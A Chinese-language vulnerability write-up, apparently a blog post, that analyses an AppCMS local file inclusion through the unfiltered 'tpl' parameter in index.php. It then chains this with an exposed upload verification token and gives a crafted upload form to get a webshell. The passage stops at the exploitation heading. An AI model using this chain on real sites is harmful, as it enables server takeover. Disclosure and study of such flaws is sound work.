appcms包含getshell 0day

0x01代碼分析

看到index.php文件

$tpl = isset($_GET['tpl'])?$_GET['tpl']:'index';
// 2.1)判斷分類綁定模板
if (intval($cid) > 0) {
    $ncate = isset($c -> categories[$cid])?$c -> categories[$cid]:'';
    if ($ncate == '') die('分類不存在');
    if ($ncate['tpl_listvar'] != '') { // 列表頁不爲空，當前頁面大於第一頁，替換爲列表頁模板
        $tpl = substr($ncate['tpl_listvar'], 0, stripos($ncate['tpl_listvar'], "."));
    } 
    if ($ncate['tpl_index'] != '') { // 封面頁不爲空，當前頁面爲第一頁，替換爲封面模板
        if ($p == 1) $tpl = substr($ncate['tpl_index'], 0, stripos($ncate['tpl_index'], "."));
    } 
} 
// 2.2)判斷分類下內容頁面模板，資訊詳情頁，應用詳情頁，應用歷史版本頁

if ($tpl == 'content_app') {
    $c -> update_vistor($id, 0);
    $con = $c -> get_content($id, 0);
    if(!isset($con['app_id'])) { die('信息不存在'); }
} elseif ($tpl == 'content_app_history') {
    $c -> update_vistor($id, 0);
    $con = $c -> get_content($id, 0); 
    // exit(print_r($con['history']));
    foreach($con['history'] as $a) { // 判斷當前應用版本信息
        if ($a['history_id'] == $hid) {
            $history = $a; 
            // print_r($history);
            continue;
        } 
    } 
    if (!isset($history)) die('歷史版本數據不存在');
} elseif ($tpl == 'content_info') {
    $c -> update_vistor($id, 1);
    $con = $c -> get_content($id, 1);
    if(!isset($con['info_id'])) { die('信息不存在'); }
} 

if (isset($con) && $c -> categories[$con['last_cate_id']]['tpl_content'] != '') $tpl = $c -> categories[$con['last_cate_id']]['tpl_content'];
// 內容頁頂級分類ID判斷，導航條使用
if (isset($con)) {
    $top = $c -> cate_father($con['last_cate_id']);
    $topid = $top[0]['cate_id'];
} 
// 3)組合模板頁面路徑
$from_mobile = TEMPLATE;

if (defined('CONTENT_MOBILE') && CONTENT_MOBILE == 1) { // 自適應WAP瀏覽
    if ($c -> from_mobile()) {
        
        $from_mobile =  defined('WAP_TPL') && WAP_TPL ? WAP_TPL : m;
    } 
} 

if (defined('WAP_URL') && WAP_URL != '' && 'http://' . $_SERVER['HTTP_HOST'] == WAP_URL) { // WAP獨立域名瀏覽
    $from_mobile = WAP_TPL;
} 

if (substr($_SERVER['HTTP_HOST'], 0, 4) == 'mkt.') { // 手機客戶端
    $from_mobile = "mkt";
} 

if (substr($tpl, strlen($tpl)-4, 4) == '.php') {
    $tmp_file = '/templates/' . $from_mobile . '/' . $tpl;
} else {
    $tmp_file = '/templates/' . $from_mobile . '/' . $tpl . '.php';
} 
if (!file_exists(dirname(__FILE__) . $tmp_file)) die('模板頁面不存在' . $tmp_file);
require(dirname(__FILE__) . $tmp_file);
/**
 * 其餘動做函數開始
 */

能夠看到傳進來的tpl沒有作任何過濾，直接包含了。

可是這個cms沒有直接上傳的地方，前臺沒啥功能。可是，如何利用這個包含呢？難道只有包含日誌神馬的嗎？那太雞肋了。咱們應該想辦法來getshell。

看到/upload/upload_file.php

$page['get'] = $_GET;
$page['post'] = $_POST;
$dbm = new db_mysql();

$params = $page['get']['params'];
/**
 * $params=json_encode(urldecode($params));
 * die('<script> alert('.$params.');</script>');
 */
$params = preg_replace('~(\\\")~', '"', $params);
$json_params = json_decode($params);
// 1.驗證請求安全性
$verify = isset($page['get']['v'])?$page['get']['v']:'';
if ($verify == '') die('<script>alert("No Access 001");</script>');
$verify = helper :: decrypt($verify, UPLOAD_KEY);
$gsc = substr($verify, 0, strlen(UPLOAD_CODE));
if ($gsc != UPLOAD_CODE) die('<script>alert("No Access 002 ' . $gsc . '");</script>');
if (!preg_match('~(\d{10})~', substr($verify, strlen(UPLOAD_CODE)))) die('<script>alert("No Access 003' . $verify . '");</script>');
// 2.接收圖片上傳
$save_path = '.' . UPLOAD_PATH . date('Y/m/d') . '/';
$file_name=strtolower($_FILES['file']['name']);
if(strstr($file_name,'.apk')) {
    $save_path = '.' . (defined('UPLOAD_PATH_APK')?UPLOAD_PATH_APK:'/apk/') . date('Y/m/d') . '/';
}
$upload_config = array();
$upload_config['savePath'] = $save_path; //圖片保存路徑

經過$verify來驗證是否能夠上傳，如何得到$verify呢。看到upload_form.php

<?php
    require_once(dirname(__FILE__)."/../core/init.php");
    $upload_server= SITE_PATH."upload/";
    // 上傳安全驗證字符串
    $verify=helper::encrypt(UPLOAD_CODE.strtotime(date('Y-m-d H:i:s')),UPLOAD_KEY);
    $params=$_GET['params'];
    $params=preg_replace('~(\\\")~','"',$params);
    $json=json_decode($params);
?>
........
<body> 
    <form action='<?php echo($upload_server); ?>upload_file.php?params=<?php echo urlencode($params);?>&v=<?php echo($verify);?>' id="form" name="form" enctype="multipart/form-data" method="post" target="hidden_frame">   
       <a class="input-file">上傳文件<input type="file" id="file" name="file" size="1" style="width:70px;cursor:default;height:25px;line-height:25px;"></a>
       <iframe name="hidden_frame" id="hidden_frame" frameborder="no" border="0″ marginwidth="0″ marginheight="0" scrolling="no" allowtransparency="yes"></iframe>
   </form> 
</body>
</html>

直接echo出了他的值,這樣就好辦了。咱們本地構造上傳表單。

</html><head>
</head>
<body> 
    <form action="http://127.0.0.1/appcms/upload/upload_file.php?params=&v=tHtAtQScLEskxnAynNEomxsWH"
id="form" name="form" enctype="multipart/form-data" method="post" target="hidden_frame">
<input type='file' name='file' />
<input type='submit' value='Upload File' />
<form> 
</body>
</html>

而後就能夠上傳了，因爲有一個回調函數，因此抓包能夠看到路徑。

0x02利用過程